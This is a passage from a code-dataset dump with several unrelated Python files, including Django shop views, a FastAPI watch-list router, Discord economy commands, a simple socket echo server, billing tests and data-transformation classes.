user))\n product = Product.objects.get(pk=product_id)\n in_cart = False\n if user.is_authenticated:\n in_cart = Cart.objects.filter(Q(product=product.id) & Q(user=request.user)).exists()\n return render(request, 'app/productdetail.html', {'product':product, 'in_cart':in_cart, 'total_items':total_items})\n\n\n\n# Products in user cart\n@login_required\ndef add_to_cart(request):\n user= request.user\n product_id = request.GET.get('prod_id')\n product = Product.objects.get(id=product_id)\n Cart(user=user, product=product).save()\n return redirect('/cart')\n\n@login_required\ndef show_cart(request):\n total_items = 0\n user = request.user\n if user.is_authenticated:\n total_items = len(Cart.objects.filter(user= user))\n if user.is_authenticated:\n cart = Cart.objects.filter(user=user)\n amount = 0.0\n shipping_amount = 70.0\n total_amount = 0.0\n cart_has_items = [item for item in Cart.objects.all() if item.user == user]\n if cart_has_items:\n for item in cart_has_items:\n temp = (item.quantity * item.product.discounted_price)\n amount += temp\n total_amount = amount + shipping_amount\n return render(request, 'app/addtocart.html', {'cart': cart, 'total_amount': total_amount, 'amount': amount, 'total_items':total_items})\n else:\n return render(request, 'app/emptycart.html')\n\ndef plus_cart(request):\n user = request.user\n if request.method==\"GET\":\n product_id = request.GET['product_id']\n item = Cart.objects.get(Q(product=product_id) & Q(user=request.user))\n item.quantity+=1\n item.save()\n amount = 0.0\n shipping_amount = 70.0\n cart_has_items = [item for item in Cart.objects.all() if item.user == request.user]\n for item in cart_has_items:\n temp = (item.quantity * item.product.discounted_price)\n amount += temp\n\n data = {\n 'quantity': item.quantity,\n 'amount': amount,\n 'total_amount': amount + shipping_amount,\n }\n return JsonResponse(data)\n\ndef minus_cart(request):\n user = request.user\n if request.method==\"GET\":\n product_id = request.GET['product_id']\n item = Cart.objects.get(Q(product=product_id) & Q(user=request.user))\n item.quantity-=1\n item.save()\n amount = 0.0\n shipping_amount = 70.0\n cart_has_items = [item for item in Cart.objects.all() if item.user == request.user]\n for item in cart_has_items:\n temp = (item.quantity * item.product.discounted_price)\n amount += temp\n\n data = {\n 'quantity': item.quantity,\n 'amount': amount,\n 'total_amount': 
amount + shipping_amount,\n        }\n        return JsonResponse(data)\n\ndef removeitem(request):\n    total_items = 0 \n    if request.method==\"GET\":\n        product_id = request.GET['product_id']\n        item = Cart.objects.get(Q(product=product_id) & Q(user=request.user))\n        item.delete()\n        amount = 0.0\n        shipping_amount = 70.0\n        cart_has_items = [item for item in Cart.objects.all() if item.user == request.user]\n        for item in cart_has_items:\n            temp = (item.quantity * item.product.discounted_price)\n            amount += temp\n            total_items +=1\n\n        data = {\n            'amount': amount,\n            'total_amount': amount + shipping_amount,\n            'total_items':total_items,\n        }\n        return JsonResponse(data)\n\n@login_required\ndef checkout(request):\n    user = request.user\n    total_items = 0\n    if user.is_authenticated:\n        total_items = len(Cart.objects.filter(user= user))\n    addr = Customer.objects.filter(user=user)\n    cart_items = Cart.objects.filter(user=user)\n    amount = 0.0\n    shipping_amount = 70.0\n    total_amount = 0.0\n    prices = []  # initialized up front so the render context is valid even for an empty cart\n    cart_has_items = [item for item in Cart.objects.all() if item.user == request.user]\n    if cart_has_items:\n        for item in cart_has_items:\n            temp = (item.quantity * item.product.discounted_price)\n            amount += temp\n            prices.append(temp)\n        total_amount = amount + shipping_amount\n    return render(request, 'app/checkout.html', {'addr':addr, 'total_amount': total_amount, 'cart_items':cart_items, 'prices':prices, 'total_items':total_items})\n\ndef payment(request):\n    user = request.user\n    custid = request.GET.get('custid')\n    customer = Customer.objects.get(id=custid)\n    cart = Cart.objects.filter(user=user)\n    for item in cart:\n        Order(user=user, customer=customer, product=item.product, quantity=item.quantity).save()\n        item.delete()\n    return redirect ('orders')\n\n@login_required\ndef orders(request):\n    total_items = 0\n    user = request.user\n    if user.is_authenticated:\n        total_items = len(Cart.objects.filter(user= user))\n    orders = Order.objects.filter(user=user)\n    return render(request, 'app/orders.html', {'orders':orders, 'total_items':total_items})\n\n\n\n# Profile and Addresses\n@method_decorator(login_required, name='dispatch')\nclass ProfileView(View):\n    def get(self, request):\n        total_items = 0\n        user = request.user\n        if user.is_authenticated:\n            total_items = len(Cart.objects.filter(user= user))\n        form = ProfileForm()\n        return render(request, 'app/profile.html', {'form':form, 'active':'btn-primary', 'total_items':total_items})\n\n    def post(self, request):\n        success=False\n        form = ProfileForm(request.POST)\n        total_items = 0\n        user = request.user\n        if user.is_authenticated:\n            total_items = len(Cart.objects.filter(user= user))\n        if form.is_valid():\n            name = form.cleaned_data['name']\n            locality = form.cleaned_data['locality']\n            city = form.cleaned_data['city']\n            state = form.cleaned_data['state']\n            pincode = form.cleaned_data['pincode']\n            data = Customer(user=user, name=name, locality=locality, city=city, state=state, pincode=pincode)\n            data.save()\n            messages.success(request, 'New address added successfully')\n        return render(request, 'app/profile.html', {'form':form, 'active':'btn-primary', 'total_items':total_items})\n\n@login_required\ndef address(request):\n    total_items = 0\n    user = request.user\n    if user.is_authenticated:\n        total_items = len(Cart.objects.filter(user= user))\n    addresses = Customer.objects.filter(user=request.user)\n    return render(request, 'app/address.html', {'addresses':addresses, 'active':'btn-primary', 'total_items':total_items})\n\n@login_required\ndef delete_address(request, addr_id):\n    address = 
Customer.objects.filter(id=addr_id)\n address.delete()\n return redirect('/address')\n\n\n\ndef buy_now(request):\n return render(request, 'app/buynow.html')\n\n\n\n# Adding products to categories & organised through filters\ndef phone(request, data=None):\n total_items = 0\n user = request.user\n if user.is_authenticated:\n total_items = len(Cart.objects.filter(user= user))\n if data==None:\n smartphones = Product.objects.filter(category='SP')\n elif data=='Chu' or data=='PLA' or data=='Cons':\n smartphones = Product.objects.filter(category='SP').filter(brand=data)\n elif data=='below':\n smartphones = Product.objects.filter(category='SP').filter(discounted_price__lt=10000)\n elif data=='above':\n smartphones = Product.objects.filter(category='SP').filter(discounted_price__gt=10000)\n return render(request, 'app/phone.html', {'smartphones':smartphones, 'total_items':total_items})\n\ndef topwear(request, data=None):\n total_items = 0\n user = request.user\n if user.is_authenticated:\n total_items = len(Cart.objects.filter(user= user))\n if data==None:\n topwears = Product.objects.filter(category='TW')\n elif data=='Zara' or data=='Nike' or data=='Adidas' or data=='XOXO' or data=='Puma':\n topwears = Product.objects.filter(category='TW').filter(brand=data)\n elif data=='below':\n topwears = Product.objects.filter(category='TW').filter(discounted_price__lt=2000)\n elif data=='above':\n topwears = Product.objects.filter(category='TW').filter(discounted_price__gt=2000)\n return render(request, 'app/topwear.html', {'topwears':topwears, 'total_items':total_items})\n\ndef bottomwear(request, data=None):\n total_items = 0\n user = request.user\n if user.is_authenticated:\n total_items = len(Cart.objects.filter(user= user))\n if data==None:\n bottomwears = Product.objects.filter(category='BW')\n elif data=='Zara' or data=='Supreme' or data=='Levis' or data=='Adidas':\n bottomwears = Product.objects.filter(category='BW').filter(brand=data)\n elif data=='below':\n bottomwears = Product.objects.filter(category='BW').filter(discounted_price__lt=2000)\n elif data=='above':\n bottomwears = Product.objects.filter(category='BW').filter(discounted_price__gt=2000)\n return render(request, 'app/bottomwear.html', {'bottomwears':bottomwears, 'total_items':total_items})\n\n\n\n# Registering Users\nclass CustomerRegistrationView(View):\n def get(self, request):\n form = CustomerRegistrationForm\n return render(request, 'app/customerregistration.html', {'form':form})\n\n def post(self, request):\n success=False\n form = CustomerRegistrationForm(request.POST)\n if form.is_valid():\n form.save()\n success = True\n username = request.POST['username']\n return render(request, 'app/customerregistration.html', {'form':form, 'success':success,'username':username})\n\n","repo_name":"rishabhpundir/Day-41-47---27-Aug-06-Sept-2022","sub_path":"ecom/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"29266377426","text":"from fastapi import APIRouter, Depends, status\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom starlette.requests import Request\n\nfrom src.core.db.db import get_session\nfrom src.rest.managers.watch_list_manager import WatchListManager\nfrom src.rest.permissions import is_authenticated_permission\nfrom src.rest.schemas.watchlist_schema import (\n WatchListSchema,\n WatchListInputSchema,\n WatchListWithProductSchema\n)\n\nwatchlist_router = APIRouter(tags=['watch_lists'], prefix='/watch_lists')\n\n\n@watchlist_router.get(\n '/mine/products',\n response_model=list[WatchListWithProductSchema],\n dependencies=[Depends(is_authenticated_permission)]\n)\nasync def get_product(\n request: Request,\n session: AsyncSession = Depends(get_session),\n):\n return await WatchListManager.list(session=session, filter_by={'user_id': request.user.id})\n\n\n@watchlist_router.post(\n '/mine/products',\n response_model=WatchListSchema,\n status_code=status.HTTP_201_CREATED,\n dependencies=[Depends(is_authenticated_permission)]\n)\nasync def add_product_to_watchlist(\n product_info: WatchListInputSchema,\n request: Request,\n session: AsyncSession = Depends(get_session)\n) -> WatchListSchema:\n return await WatchListManager.create(\n input_data=WatchListSchema(\n user_id=request.user.id,\n product_id=product_info.product_id\n ),\n session=session\n )\n\n\n@watchlist_router.delete(\n '/mine/products/{product_id}',\n status_code=status.HTTP_204_NO_CONTENT,\n dependencies=[Depends(is_authenticated_permission)]\n)\nasync def delete_product_from_watchlist(\n product_id: int,\n request: Request,\n session: AsyncSession = Depends(get_session)\n):\n await WatchListManager.delete(\n product_id=product_id,\n user_id=request.user.id,\n session=session\n )\n","repo_name":"dmitryzhurkovsky/cabel_torg","sub_path":"backend/src/rest/api/v1/watchlist_router.py","file_name":"watchlist_router.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"40654304129","text":"#!/usr/bin/env python3\n\nfrom rosclass1 import FourXFourBotControl\nimport rospy\n\nrospy.init_node('tx2', anonymous=True)\nffbc = FourXFourBotControl()\n\nfor i in range(10):\n ffbc.set_wheels_frequency(0, 0)\n rospy.sleep(0.5)\n","repo_name":"IgorLebed/agriculture_pest_exterminator","sub_path":"src/robot_gnss/stop.py","file_name":"stop.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"17645628700","text":"from telas.tela_relatorio import TelaRelatorio\nfrom persistencia.relatorioDAO import RelatorioDAO\nfrom excecoes.valueErrorException import ValueErrorException\n\nclass ControladorRelatorio:\n def __init__(self, controlador_sistema):\n self.__controlador_sistema = controlador_sistema\n self.__tela_relatorio = TelaRelatorio()\n self.__relatorio_DAO = RelatorioDAO()\n\n @property\n def relatorio_DAO(self):\n return self.__relatorio_DAO\n \n def abre_tela_relatorios(self):\n try:\n opcoes_relatorios = {1: self.relatorio_paises,\n 2: self.relatorio_tipos_de_visto,\n 0: self.__controlador_sistema.get_controlador_gerente.iniciar_tela_gerente}\n while True:\n opcao_escolhida = self.__tela_relatorio.emissao_relatorios()\n if opcao_escolhida != 1 and opcao_escolhida != 2 and opcao_escolhida != 0:\n raise ValueErrorException\n funcao_escolhida = opcoes_relatorios[opcao_escolhida]\n return funcao_escolhida()\n except ValueErrorException as e:\n self.__tela_relatorio.mostra_mensagem(e)\n self.abre_tela_relatorios()\n\n def relatorio_paises(self):\n print('entrou no relatorio de pa��ses')\n relatorios = self.__relatorio_DAO.relatorio_paises()\n botao, values = self.__tela_relatorio.relatorio_paises(relatorios)\n if botao == 'Voltar':\n return self.abre_tela_relatorios()\n\n def relatorio_tipos_de_visto(self):\n print('entrou no relatorio de tipos de visto')\n relatorios = self.__relatorio_DAO.relatorio_tipos_de_visto()\n botao, values = self.__tela_relatorio.relatorio_tipos_de_visto(relatorios)\n if botao == 'Voltar':\n return self.abre_tela_relatorios()\n\n\n","repo_name":"juufernandaw/Visaccess","sub_path":"controladores/controlador_relatorio.py","file_name":"controlador_relatorio.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"73476119121","text":"import discord\nfrom discord.ext.commands import Context, UserConverter\nfrom disputils import BotConfirmation\nfrom utils.errors import MoneyError\nfrom utils.logs.economy import lose_money, win_money\nfrom utils.responses.Embed import Embed\nfrom utils.ddbb.economy import *\n\n\nclass Buttons(discord.ui.View):\n def __init__(self, ctx: Context, user: discord.User, money: int, embed: Embed, is_add: bool):\n super().__init__(timeout=30)\n self.ctx = ctx\n self.user = user\n self.money = money\n self.embed = embed\n self.is_add = is_add\n \n @discord.ui.button(label='Aceptar', style=discord.ButtonStyle.green)\n async def accept(self, interaction: discord.Interaction, button: discord.ui.Button):\n msg = ''\n if self.is_add:\n await win_money(self.ctx, self.user, self.money, f'Add money by {self.ctx.author.id}')\n msg = f'{int(self.money):,} 💰 **entregado** correctamente al usuario <@{self.user.id}>'\n self.embed.success()\n else:\n await lose_money(self.ctx, self.user, self.money, f'Add money by {self.ctx.author.id}')\n msg = f'{int(self.money):,} 💰 **quitado** correctamente al usuario <@{self.user.id}>'\n self.embed.success()\n self.embed.description = msg\n await interaction.response.edit_message(embed=self.embed.get_embed(), view=None)\n \n @discord.ui.button(label='Rechazar', style=discord.ButtonStyle.red)\n async def reject(self, interaction: discord.Interaction, button: discord.ui.Button):\n self.embed.description = 'Operación cancelada!'\n self.embed.failure()\n await interaction.response.edit_message(embed=self.embed.get_embed(), view=None)\n\n\nasync def add_money(ctx: Context, user: discord.User, money: int):\n try:\n money = int(money)\n if money < 1:\n raise\n except:\n raise MoneyError(min=1)\n embed = Embed(title='Entrega de dinero', description=f'Seguro que quieres **entregar** {int(money):,} 💰 a {user.mention}?', user=ctx.author).warn()\n await ctx.channel.send(embed=embed.get_embed(), view=Buttons(ctx, user, money, embed, True))\n\n\n\nasync def remove_money(ctx: Context, user, money: int):\n try:\n money = int(money)\n if money < 1:\n raise\n except:\n raise MoneyError(min=1)\n embed = Embed(title='Entrega de dinero', description=f'Seguro que **quitar** dar {int(money):,} 💰 a {user.mention}?', user=ctx.author).warn()\n await ctx.channel.send(embed=embed.get_embed(), view=Buttons(ctx, user, money, embed, False))\n","repo_name":"AlguienSama/discord-bot-python","sub_path":"commands/admin/commands/economy.py","file_name":"economy.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"29886618966","text":"import socket\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver_addr = ('127.0.0.1', 41903)\nserver.bind(server_addr)\nprint('服务器开启')\nserver.listen()\nwhile 1:\n try:\n conn, conn_addr = server.accept()\n except Exception:\n break\n while 1:\n try:\n msg = conn.recv(65535)\n if not msg:\n break\n msg = msg.decode()\n print('收到{}的消息:{}'.format(conn_addr, msg))\n return_msg = '已收到消息'+ msg\n conn.send(return_msg.encode())\n except Exception:\n break\n conn.close()\n print('{}的链接断开'.format(conn_addr))\nserver.close()\nprint('服务器断开')","repo_name":"ljpqjppp/socket","sub_path":"less0401/ser3.py","file_name":"ser3.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"29046929997","text":"# -*- coding: utf-8 -*-\n\nimport decimal\n\nimport pytest\nimport hamcrest\n\nfrom btestlib import utils\nfrom btestlib import constants\nfrom balance import balance_steps\nfrom check import shared_steps, shared\nfrom btestlib.data import partner_contexts\n\n\nCONTEXT = partner_contexts.FOOD_RESTAURANT_CONTEXT\nRESTAURANT_COMPLETION_SERVICE = constants.Services.FOOD_SERVICES\n\n\nclass States(object):\n missing_in_food = 1\n missing_in_billing = 2\n amount_mismatch = 3\n\n\ndef create_client():\n client_id, person_id, contract_id, _ = balance_steps.ContractSteps.create_partner_contract(\n CONTEXT, is_offer=1, additional_params={'start_dt': shared_steps.COMPLETION_DT})\n return client_id\n\n\ndef create_balance_completions(client_id, commission_sum='100',\n service_id=RESTAURANT_COMPLETION_SERVICE.id):\n balance_steps.PartnerSteps.create_fake_product_completion(\n shared_steps.COMPLETION_DT, client_id=client_id,\n service_id=service_id, service_order_id=0,\n commission_sum=decimal.Decimal(commission_sum),\n currency=CONTEXT.currency.iso_code,\n type=constants.FoodProductType.GOODS,\n transaction_dt=shared_steps.COMPLETION_DT,\n )\n\n\ndef format_yt_data(client_id, commission_sum='100',\n service_id=RESTAURANT_COMPLETION_SERVICE.id):\n return {\n 'client_id': client_id,\n 'commission_sum': commission_sum,\n 'dt': shared_steps.COMPLETION_DT,\n 'service_id': service_id,\n 'currency': CONTEXT.currency.iso_code,\n 'type': constants.FoodProductType.GOODS,\n }\n\n\n@pytest.mark.shared(block=shared_steps.SharedBlocks.RUN_CBF)\nclass TestCbf(object):\n def run_cmp(self, shared_data, before):\n cmp_data = shared_steps.SharedBlocks.run_cbf(shared_data, before, pytest.active_tests)\n return cmp_data or shared_data.cache and shared_data.cache.get('cmp_data') or []\n\n def test_without_diff(self, shared_data):\n with shared.CheckSharedBefore(shared_data=shared_data,\n cache_vars=['client_id', 'yt_data']) as before:\n before.validate()\n\n client_id = create_client()\n create_balance_completions(client_id)\n yt_data = format_yt_data(client_id)\n\n cmp_data = self.run_cmp(shared_data, before)\n\n clients = set(row['client_id'] for row in cmp_data)\n utils.check_that(clients, hamcrest.not_(hamcrest.contains(client_id)))\n\n def test_skip_9999_service(self, shared_data):\n with shared.CheckSharedBefore(shared_data=shared_data,\n cache_vars=['client_id', 'yt_data']) as before:\n before.validate()\n\n client_id = create_client()\n\n inner_service_id = 9999\n create_balance_completions(client_id, service_id=inner_service_id)\n yt_data = format_yt_data(client_id, service_id=inner_service_id)\n\n cmp_data = self.run_cmp(shared_data, before)\n\n clients = set(row['client_id'] for row in cmp_data)\n utils.check_that(clients, hamcrest.not_(hamcrest.contains(client_id)))\n\n def test_missing_in_food(self, shared_data):\n with shared.CheckSharedBefore(shared_data=shared_data,\n cache_vars=['client_id']) as before:\n before.validate()\n\n client_id = create_client()\n create_balance_completions(client_id)\n\n cmp_data = self.run_cmp(shared_data, before)\n cmp_data = [(row['client_id'], row['state']) for row in cmp_data\n if row['state'] == States.missing_in_food]\n\n utils.check_that(cmp_data, hamcrest.has_length(1))\n\n expected = [(client_id, States.missing_in_food)]\n utils.check_that(cmp_data, hamcrest.equal_to(expected))\n\n def test_missing_in_billing(self, shared_data):\n with shared.CheckSharedBefore(shared_data=shared_data,\n cache_vars=['client_id', 'yt_data']) as before:\n 
before.validate()\n\n client_id = create_client()\n yt_data = format_yt_data(client_id)\n\n cmp_data = self.run_cmp(shared_data, before)\n cmp_data = [(row['client_id'], row['state']) for row in cmp_data\n if row['state'] == States.missing_in_billing]\n\n utils.check_that(cmp_data, hamcrest.has_length(1))\n\n expected = [(client_id, States.missing_in_billing)]\n utils.check_that(cmp_data, hamcrest.equal_to(expected))\n\n def test_amount_mismatch(self, shared_data):\n with shared.CheckSharedBefore(shared_data=shared_data,\n cache_vars=['client_id', 'yt_data']) as before:\n before.validate()\n\n client_id = create_client()\n create_balance_completions(client_id, commission_sum='100')\n yt_data = format_yt_data(client_id, commission_sum='111')\n\n cmp_data = self.run_cmp(shared_data, before)\n cmp_data = [(row['client_id'], row['food_amount'], row['billing_amount'], row['state'])\n for row in cmp_data if row['state'] == States.amount_mismatch]\n\n utils.check_that(cmp_data, hamcrest.has_length(1))\n\n expected = [(client_id, 111, 100, States.amount_mismatch)]\n utils.check_that(cmp_data, hamcrest.equal_to(expected))\n\n# vim:ts=4:sts=4:sw=4:tw=79:et:\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"billing/balance_tests/check/tests/test_cbf.py","file_name":"test_cbf.py","file_ext":"py","file_size_in_byte":5375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"25214212701","text":"import os\nimport xml.etree.ElementTree as ET\n\nimport django\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand\n\nfrom interface.models import Review, Item\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mentorship.settings')\n\ndjango.setup()\n\n\nclass Command(BaseCommand):\n def _save_review(self, reviews, is_positive):\n saved_reviews = []\n if reviews != '':\n review_list = [review.strip() for raw_reviews in reviews for review in raw_reviews.split(',') if review]\n reviews_with_occurrences = [(review, review_list.count(review)) for review in set(review_list)]\n for review in reviews_with_occurrences:\n saved_review = Review.objects.create(description=review[0].strip(), is_positive=is_positive, occurrences=review[1])\n saved_reviews.append(saved_review)\n return saved_reviews\n\n def _save_data_from_xml(self):\n file_path = os.path.join(os.path.join(os.path.join(os.path.join(os.path.join(settings.BASE_DIR, '..'), 'scraper'), 'Output'), 'all'), 'final_reviews.xml')\n xml_file = ET.parse(file_path)\n root = xml_file.getroot()\n for item in root:\n xml_positive_reviews = []\n xml_negative_reviews = []\n saved_item = None\n created = None\n for properties in item:\n if properties.tag == 'name':\n print(f'--- ---Saving data for: {properties.text}')\n saved_item, created = Item.objects.get_or_create(name=properties.text)\n if not created:\n print(f'--- --- ---Item already exists. Skipped')\n\n if properties.tag == 'review' and saved_item and created:\n xml_negative_reviews.append(properties.get('negative'))\n xml_positive_reviews.append(properties.get('positive'))\n\n if saved_item:\n for review in self._save_review(xml_negative_reviews, False):\n saved_item.reviews.add(review)\n\n for review in self._save_review(xml_positive_reviews, True):\n saved_item.reviews.add(review)\n\n def handle(self, *args, **options):\n print('--- Saving data from xml')\n self._save_data_from_xml()\n print('--- Done ---')\n","repo_name":"ionutlng/Analyse-Amazon-products-reviews","sub_path":"scraper_interface/interface/management/commands/save_data_from_xml.py","file_name":"save_data_from_xml.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"74859186961","text":"\"\"\"Data transformations.\n\nScientific Machine Learning Benchmark: \nA benchmark of regression models in chem- and materials informatics.\n(c) Matthias Rupp 2019, Citrine Informatics.\n\nDataTransformations are functors (function objects) that can be fitted \nto data and then applied to transform (other) data.\nExamples include samplers, featurizers, preprocessors, and learners.\n\nDesign decisions:\n* smlb objects are light-weight. Since fitting is potentially\n data-intense, it can not be done in the initializer. Hence\n fitting is done in a separate method.\n* Some transformations return Data, some return something else,\n for example, learners can return predictive distributions.\n Therefore, two types of DataTransformation are distinguished:\n transformations from and to Data, and transformations from\n data to something else. The latter would terminate chains of\n transformations: \n data_1 -A_1-> data_2 -A_2-> ... -> data_n-1 -B-> data_n,\n where A are data-to-data and B are data-to-other transformations.\n\"\"\"\n\nfrom abc import ABCMeta, abstractmethod\nfrom typing import Any, Sequence\n\nimport numpy as np\n\nfrom smlb import BenchmarkError, InvalidParameterError\nfrom smlb import Data, complement\nfrom smlb import SmlbObject\nfrom smlb import is_sequence\nfrom smlb import params\n\n\nclass DataTransformation(SmlbObject, metaclass=ABCMeta):\n \"\"\"Abstract base class for data transformations.\n\n A DataTransformation is a function object that can be fitted on\n training data and applied to (other) data to return transformed data.\n Its interface contains two functions, fit() and apply().\n\n Provides:\n fit: accepts data, setting internal state\n apply: accepts and returns transformed data.\n \"\"\"\n\n def fit(self, data: Data) -> \"DataTransformation\":\n \"\"\"Adjusts internal state based on data ('fitting', 'training').\n\n Parameters:\n data: training data\n\n Returns:\n self, to allow chaining\n\n Example:\n DataTransformation(...).fit(data).apply(otherdata)\n \"\"\"\n\n return self\n\n @abstractmethod\n def apply(self, data: Data) -> Any:\n \"\"\"Transforms data.\n\n Parameters:\n data: data to transform\n\n Returns:\n transformation result; can be derived from Data, but does not have to be\n \"\"\"\n\n raise NotImplementedError\n\n\nclass DataValuedTransformation(DataTransformation):\n \"\"\"Abstract base class for all transformation that return Data.\n\n The apply() method returns an object derived from Data.\n \"\"\"\n\n @abstractmethod\n def apply(self, data: Data) -> Data:\n \"\"\"Transforms data.\n\n Parameters:\n data: data to transform\n\n Returns:\n transformed data\n \"\"\"\n\n raise NotImplementedError\n\n\nclass DataPipelineTransformation(DataValuedTransformation):\n \"\"\"Pipeline of data-valued transformations that are applied sequentially.\"\"\"\n\n def __init__(self, steps: Sequence[DataValuedTransformation], *args, **kwargs):\n \"\"\"Initialize state.\n\n Parameters:\n steps: List of data-valued transformations\n \"\"\"\n super().__init__(*args, **kwargs)\n steps = params.sequence(steps, type_=DataValuedTransformation)\n self._steps = steps\n\n def fit(self, data: Data) -> \"DataPipelineTransformation\":\n \"\"\"Fit each step.\n\n Steps are fit sequentially and used to transform the data.\n The transformed output of each step is used as the training data for the next step.\n\n Parameters:\n data: training data\n\n Returns:\n self, to allow chaining\n \"\"\"\n for step in self._steps:\n data = 
step.fit(data).apply(data)\n return self\n\n def apply(self, data: Data) -> Data:\n \"\"\"Apply each step sequentially.\n\n The transformed output of each step is used as the training data for the next step.\n\n Parameters:\n data: data to transform\n\n Returns:\n transformed data\n \"\"\"\n for step in self._steps:\n data = step.apply(data)\n return data\n\n\nclass IdentityTransformation(DataValuedTransformation):\n \"\"\"Returns data unchanged.\"\"\"\n\n def apply(self, data: Data) -> Data:\n \"\"\"Return data unchanged.\n\n The identity transformation.\n\n Parameters:\n data: any data\n\n Returns:\n unchanged data\n \"\"\"\n\n return data\n\n\nclass InvertibleTransformation(SmlbObject, metaclass=ABCMeta):\n \"\"\"Abstract mix-in base class for invertible transformations.\n\n For DataTransformations that are invertible in the loose sense that\n data -> transformation -> inverse transformation yields data related\n in some way to the original inputs. In particular, inversion does not\n need to be exact, for example, dimensionality reduction might return\n original data points only up to projection onto the learned subspace.\n\n After fitting, use 'inverse()' to retrieve the inverse data transformation:\n f = transformation(...).fit(training_data);\n f.inverse().apply(f.apply(other_data)) # \"close\" to identity in some sense\n\n The inverse transformation must be a DataValuedTransformation.\n \"\"\"\n\n @abstractmethod\n def inverse(self) -> DataValuedTransformation:\n \"\"\"Return inverse of DataTransformation.\"\"\"\n\n raise NotImplementedError\n\n\nclass DataTransformationFailureMode:\n \"\"\"Provide failure mode handling for 1:1 data transformations.\n\n Provides utility functionality for one-to-one data transformations (mapping one input sample\n to one output sample) to handle failed transformations of individual samples.\n \"\"\"\n\n def __init__(self, failmode, num_samples: int):\n \"\"\"Initialize failure handler.\n\n Parameters:\n failmode: how to handle failed descriptor calculations, either due to rejected SMILES\n encodings or failing descriptor code. Possible values:\n \"raise\" [default]: raise a BenchmarkException\n \"drop\": drop the sample. 
Returned Data will have fewer samples\n (\"mask\", mask): where `mask` is a NumPy array with dtype bool whose entries will\n be set to False for failures\n (\"index\", index): where `index` is an empty list to which the indices of failed\n entries will be appended\n num_samples: number of samples that are transformed\n \"\"\"\n\n self.num_samples = params.integer(num_samples, from_=0)\n self.failmode = self.failmode(failmode)\n\n if is_sequence(self.failmode) and self.failmode[0] == \"mask\":\n self.failmode = \"mask\"\n if len(failmode[1]) != self.num_samples:\n raise InvalidParameterError(\n \"failure mode mask length of {self.num_samples}\", len(self.mask)\n )\n self.mask = failmode[1]\n self.mask.fill(False)\n\n if is_sequence(self.failmode) and self.failmode[0] == \"index\":\n self.failmode = \"index\"\n self.index = failmode[1]\n\n self.failures = [] # list of indices of failed samples\n\n @staticmethod\n def failmode(failmode):\n \"\"\"Failure mode.\n\n Validate that argument is failure mode, similar to smlb.params.\n See __init__ for valid values.\n \"\"\"\n\n ipe = InvalidParameterError(\"valid failure mode specification\", failmode)\n\n if failmode in (\"raise\", \"drop\"):\n return failmode\n\n if not (is_sequence(failmode) and len(failmode) == 2):\n raise ipe\n\n if (\n failmode[0] == \"mask\"\n and isinstance(failmode[1], np.ndarray)\n and failmode[1].ndim == 1\n and failmode[1].dtype.name == \"bool\"\n ):\n return failmode\n\n if failmode[0] == \"index\" and isinstance(failmode[1], list) and len(failmode[1]) == 0:\n return failmode\n\n raise ipe\n\n def handle_failure(self, i):\n \"\"\"Take action according to failure mode.\n\n Parameters:\n i: index of failed sample\n \"\"\"\n\n if self.failmode == \"raise\":\n raise BenchmarkError(f\"DataTransformation failed for sample #{i}\")\n elif self.failmode in (\"drop\", \"mask\", \"index\"):\n self.failures.append(i)\n else:\n raise BenchmarkError(f\"Internal error, unknown failure mode {self._failmode_failmode}\")\n\n def finalize(self, data: Data) -> Data:\n \"\"\"Change dataset according to registered failures and failure mode.\n\n Parameters:\n data: transformed Data\n\n Returns:\n Transformed Data after handling failures.\n \"\"\"\n\n self.failures = sorted(list(set(self.failures))) # remove duplicate indices\n\n if self.failmode == \"raise\":\n if len(self.failures) > 0:\n raise BenchmarkError(\"DataTransformation failed for some samples\")\n return data\n elif self.failmode == \"drop\":\n return complement(data, data.subset(self.failures)) # todo: duplicates?\n elif self.failmode == \"mask\":\n self.mask[self.failures] = True\n return data\n elif self.failmode == \"index\":\n self.index.extend(self.failures)\n return data\n\n raise BenchmarkError(f\"Internal error, unrecognized failure mode '{self.failmode}'\")\n","repo_name":"CitrineInformatics/smlb","sub_path":"smlb/core/transformations.py","file_name":"transformations.py","file_ext":"py","file_size_in_byte":9440,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"3"}
